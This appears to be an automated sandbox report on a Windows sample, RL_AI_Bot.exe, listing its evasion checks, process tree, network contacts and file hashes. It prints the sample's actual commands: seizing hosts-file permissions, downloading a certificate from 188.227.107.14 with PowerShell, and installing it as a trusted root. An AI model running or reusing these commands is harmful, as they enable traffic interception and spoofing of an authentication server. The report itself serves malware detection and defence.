Malware Analysis Report

2024-12-07 14:56

Sample ID: 241005-amd41ayeqe
Target: RL_AI_Bot.exe
SHA256: c388a38e46a212f9413d41a9f28265a2fe1c7c77b3620bfcdcc6c7b4b3b9dee0
Tags: defense_evasion, discovery, evasion, execution, exploit, themida, trojan
Score: 9/10

Analysis Overview

Score: 9/10

SHA256: c388a38e46a212f9413d41a9f28265a2fe1c7c77b3620bfcdcc6c7b4b3b9dee0

Threat Level: Likely malicious

The file RL_AI_Bot.exe was found to be: Likely malicious.

Malicious Activity Summary

Tags: defense_evasion, discovery, evasion, execution, exploit, themida, trojan

Identifies VirtualBox via ACPI registry values (likely anti-VM)

Blocklisted process makes network request

Possible privilege escalation attempt

Drops file in Drivers directory

Command and Scripting Interpreter: PowerShell

Checks BIOS information in registry

Executes dropped EXE

Themida packer

Modifies file permissions

Checks whether UAC is enabled

Suspicious use of NtSetInformationThreadHideFromDebugger

AutoIT Executable

Hide Artifacts: Ignore Process Interrupts

Unsigned PE

Suspicious use of FindShellTrayWindow

Suspicious behavior: EnumeratesProcesses

Gathers network information

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Suspicious use of SendNotifyMessage

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-10-05 00:19

Signatures

AutoIT Executable

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A

Unsigned PE

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-10-05 00:19

Reported

2024-10-05 00:20

Platform

win11-20240802-en

Max time kernel

33s

Max time network

35s

Command Line

"C:\Users\Admin\AppData\Local\Temp\RL_AI_Bot.exe"

Signatures

Identifies VirtualBox via ACPI registry values (likely anti-VM)

Tags: evasion

Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\RL_AI.exe | N/A

Blocklisted process makes network request

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Command and Scripting Interpreter: PowerShell

Tags: execution

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Drops file in Drivers directory

Description | Indicator | Process | Target
File opened for modification | C:\Windows\System32\drivers\etc\hosts | C:\Windows\system32\cmd.exe | N/A

Possible privilege escalation attempt

Tags: exploit

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\takeown.exe | N/A
N/A | N/A | C:\Windows\system32\icacls.exe | N/A

Checks BIOS information in registry

Description | Indicator | Process | Target
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\RL_AI.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\RL_AI.exe | N/A

Executes dropped EXE

Description | Indicator | Process | Target
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RL_AI.exe | N/A

Modifies file permissions

Tags: discovery

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\takeown.exe | N/A
N/A | N/A | C:\Windows\system32\icacls.exe | N/A

Themida packer

Tags: themida

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A
(10 matches recorded, all with no description, indicator, process or target)

Checks whether UAC is enabled

Tags: evasion, trojan

Description | Indicator | Process | Target
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\RL_AI.exe | N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description | Indicator | Process | Target
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RL_AI.exe | N/A

Hide Artifacts: Ignore Process Interrupts

Tags: defense_evasion

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Gathers network information

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\ipconfig.exe | N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target
PID 1004 wrote to memory of 2044 | N/A | C:\Users\Admin\AppData\Local\Temp\RL_AI_Bot.exe | C:\Windows\system32\cmd.exe
PID 1004 wrote to memory of 2044 | N/A | C:\Users\Admin\AppData\Local\Temp\RL_AI_Bot.exe | C:\Windows\system32\cmd.exe
PID 2044 wrote to memory of 4616 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe
PID 2044 wrote to memory of 4616 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe
PID 4616 wrote to memory of 960 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\takeown.exe
PID 4616 wrote to memory of 960 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\takeown.exe
PID 4616 wrote to memory of 1068 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\icacls.exe
PID 4616 wrote to memory of 1068 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\icacls.exe
PID 4616 wrote to memory of 3192 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\certutil.exe
PID 4616 wrote to memory of 3192 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\certutil.exe
PID 4616 wrote to memory of 232 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\findstr.exe
PID 4616 wrote to memory of 232 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\findstr.exe
PID 4616 wrote to memory of 4824 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4616 wrote to memory of 4824 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4616 wrote to memory of 4864 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe
PID 4616 wrote to memory of 4864 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe
PID 4864 wrote to memory of 3632 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\certutil.exe
PID 4864 wrote to memory of 3632 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\certutil.exe
PID 4616 wrote to memory of 3228 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4616 wrote to memory of 3228 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4616 wrote to memory of 2068 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe
PID 4616 wrote to memory of 2068 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe
PID 2068 wrote to memory of 3660 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\certutil.exe
PID 2068 wrote to memory of 3660 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\certutil.exe
PID 2068 wrote to memory of 4500 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\findstr.exe
PID 2068 wrote to memory of 4500 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\findstr.exe
PID 4616 wrote to memory of 1032 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\findstr.exe
PID 4616 wrote to memory of 1032 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\findstr.exe
PID 4616 wrote to memory of 2808 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\ipconfig.exe
PID 4616 wrote to memory of 2808 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\ipconfig.exe
PID 1004 wrote to memory of 4836 | N/A | C:\Users\Admin\AppData\Local\Temp\RL_AI_Bot.exe | C:\Users\Admin\AppData\Local\Temp\RL_AI.exe
PID 1004 wrote to memory of 4836 | N/A | C:\Users\Admin\AppData\Local\Temp\RL_AI_Bot.exe | C:\Users\Admin\AppData\Local\Temp\RL_AI.exe
PID 4836 wrote to memory of 2552 | N/A | C:\Users\Admin\AppData\Local\Temp\RL_AI.exe | C:\Windows\system32\cmd.exe
PID 4836 wrote to memory of 2552 | N/A | C:\Users\Admin\AppData\Local\Temp\RL_AI.exe | C:\Windows\system32\cmd.exe
PID 4836 wrote to memory of 3020 | N/A | C:\Users\Admin\AppData\Local\Temp\RL_AI.exe | C:\Windows\system32\cmd.exe
PID 4836 wrote to memory of 3020 | N/A | C:\Users\Admin\AppData\Local\Temp\RL_AI.exe | C:\Windows\system32\cmd.exe
PID 3020 wrote to memory of 3960 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\certutil.exe
PID 3020 wrote to memory of 3960 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\certutil.exe
PID 3020 wrote to memory of 3472 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\find.exe
PID 3020 wrote to memory of 3472 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\find.exe
PID 3020 wrote to memory of 1656 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\find.exe
PID 3020 wrote to memory of 1656 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\find.exe
PID 4836 wrote to memory of 4872 | N/A | C:\Users\Admin\AppData\Local\Temp\RL_AI.exe | C:\Windows\system32\cmd.exe
PID 4836 wrote to memory of 4872 | N/A | C:\Users\Admin\AppData\Local\Temp\RL_AI.exe | C:\Windows\system32\cmd.exe

Processes

C:\Users\Admin\AppData\Local\Temp\RL_AI_Bot.exe

"C:\Users\Admin\AppData\Local\Temp\RL_AI_Bot.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c @echo off & echo Running fix.bat silently... & start "" /min /b cmd /c "C:\Users\Admin\AppData\Local\Temp\fix.bat & exit"

C:\Windows\system32\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\fix.bat & exit"

C:\Windows\system32\takeown.exe

takeown /F C:\Windows\System32\drivers\etc /R /A

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\etc /grant administrators:F /T

C:\Windows\system32\certutil.exe

certutil -store TrustedRoot

C:\Windows\system32\findstr.exe

findstr /i /c:"C:\Users\Admin\AppData\Local\Temp\server.crt"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -Command "Invoke-WebRequest -Uri http://188.227.107.14/server.crt -OutFile 'C:\Users\Admin\AppData\Local\Temp\server.crt'"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\server.crt" SHA256

C:\Windows\system32\certutil.exe

certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\server.crt" SHA256

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -Command "Import-Certificate -FilePath 'C:\Users\Admin\AppData\Local\Temp\server.crt' -CertStoreLocation 'Cert:\LocalMachine\Root' -ErrorAction SilentlyContinue"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c certutil -store TrustedRoot | findstr /i /c:"C:\Users\Admin\AppData\Local\Temp\server.crt"

C:\Windows\system32\certutil.exe

certutil -store TrustedRoot

C:\Windows\system32\findstr.exe

findstr /i /c:"C:\Users\Admin\AppData\Local\Temp\server.crt"

C:\Windows\system32\findstr.exe

findstr /C:"188.227.107.14 keyauth.win" "C:\Windows\System32\drivers\etc\hosts"

C:\Windows\system32\ipconfig.exe

ipconfig /flushdns

C:\Users\Admin\AppData\Local\Temp\RL_AI.exe

C:\Users\Admin\AppData\Local\Temp\RL_AI.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c cls

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\RL_AI.exe" MD5 | find /i /v "md5" | find /i /v "certutil"

C:\Windows\system32\certutil.exe

certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\RL_AI.exe" MD5

C:\Windows\system32\find.exe

find /i /v "md5"

C:\Windows\system32\find.exe

find /i /v "certutil"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c cls

Network

Country | Destination | Domain | Proto
NL | 188.227.107.14:80 | 188.227.107.14 | tcp
US | 8.8.8.8:53 | 14.107.227.188.in-addr.arpa | udp
US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp
NL | 188.227.107.14:443 | keyauth.win | tcp
N/A | 127.0.0.1:49797 | (none) | tcp
N/A | 127.0.0.1:49799 | (none) | tcp
NL | 188.227.107.14:443 | keyauth.win | tcp
N/A | 127.0.0.1:49806 | (none) | tcp
N/A | 127.0.0.1:49808 | (none) | tcp
N/A | 127.0.0.1:49813 | (none) | tcp
N/A | 127.0.0.1:49815 | (none) | tcp
NL | 188.227.107.14:443 | keyauth.win | tcp
NL | 188.227.107.14:443 | keyauth.win | tcp
N/A | 127.0.0.1:49818 | (none) | tcp
N/A | 127.0.0.1:49820 | (none) | tcp
NL | 188.227.107.14:443 | keyauth.win | tcp
N/A | 127.0.0.1:49824 | (none) | tcp
N/A | 127.0.0.1:49826 | (none) | tcp

Files

C:\Users\Admin\AppData\Local\Temp\autA151.tmp

MD5 898bbb4fac0d31cacf8bd6f0ea1dcd14
SHA1 cbc25afd3e39ec0b030a6148ad44ae882ad063be
SHA256 87f84086ae3ebd38fe6df4c2a90cc2064787c9a863bb279cc278467aa2f0edc9
SHA512 66848d109d566c7f6c273c86b0a8611340e46534a4f028f91091d06900448c95c4093bd987c06a2be4c246ded5c6baa8de3d03049f4cfa49da9b360e6b5a2ec4

C:\Users\Admin\AppData\Local\Temp\fix.bat

MD5 ded50caaa850f5278662834fd32021ae
SHA1 2bd1354b58408585a5ef862838cb97f7ab1f219c
SHA256 9847b9305180be84090dc361c21bfc002223309fbf22a991b5396bf5a5fd79d3
SHA512 d8286d37a412aa73cd97f0a5321825f5bf138e91069477e4dddfbfcc0835723606a692da858b4331d2f127b50d2154d81fd98bd08d0a1d0904b63e07de689620

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_e0i3atge.wxq.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4824-18-0x000001C65FBF0000-0x000001C65FC12000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\server.crt

MD5 5663fb32607a5562453a8125a8f812c4
SHA1 764264efe0329df2a961dca0e45efc70878bfed7
SHA256 f6b3ca3c38d3efebe9a1e98f6042807f087688586c93513bae631fe24e1fe81e
SHA512 31b05f2d170b77ca4cfe298e913e0c07a7b5e57fbe4f1296b8b616729564f32fc3f53c6993f51dd50015aba808ae4c59560155119556e76744990cef68ef4b86

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 5f4c933102a824f41e258078e34165a7
SHA1 d2f9e997b2465d3ae7d91dad8d99b77a2332b6ee
SHA256 d69b7d84970cb04cd069299fd8aa9cef8394999588bead979104dc3cb743b4f2
SHA512 a7556b2be1a69dbc1f7ff4c1c25581a28cb885c7e1116632c535fee5facaa99067bcead8f02499980f1d999810157d0fc2f9e45c200dee7d379907ef98a6f034

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 5e6baeec02c3d93dce26652e7acebc90
SHA1 937a7b4a0d42ea56e21a1a00447d899a2aca3c28
SHA256 137bf90e25dbe4f70e614b7f6e61cba6c904c664858e1fe2bc749490b4a064c0
SHA512 461990704004d7be6f273f1cee94ea73e2d47310bac05483fd98e3c8b678c42e7625d799ac76cf47fe5e300e7d709456e8c18f9854d35deb8721f6802d24bea4

C:\Windows\System32\drivers\etc\hosts

MD5 81051bcc2cf1bedf378224b0a93e2877
SHA1 ba8ab5a0280b953aa97435ff8946cbcbb2755a27
SHA256 7eb70257593da06f682a3ddda54a9d260d4fc514f645237f5ca74b08f8da61a6
SHA512 1b302a2f1e624a5fb5ad94ddc4e5f8bfd74d26fa37512d0e5face303d8c40eee0d0ffa3649f5da43f439914d128166cb6c4774a7caa3b174d7535451eb697b5d

memory/4836-43-0x00007FF7016F0000-0x00007FF701FA2000-memory.dmp

memory/4836-45-0x00007FF7016F0000-0x00007FF701FA2000-memory.dmp

memory/4836-47-0x00007FF7016F0000-0x00007FF701FA2000-memory.dmp

memory/4836-46-0x00007FF7016F0000-0x00007FF701FA2000-memory.dmp

memory/4836-48-0x00007FF7016F0000-0x00007FF701FA2000-memory.dmp

memory/4836-51-0x00007FF7016F0000-0x00007FF701FA2000-memory.dmp

memory/4836-54-0x00007FF7016F0000-0x00007FF701FA2000-memory.dmp

memory/4836-55-0x00007FF7016F0000-0x00007FF701FA2000-memory.dmp

memory/4836-57-0x00007FF7016F0000-0x00007FF701FA2000-memory.dmp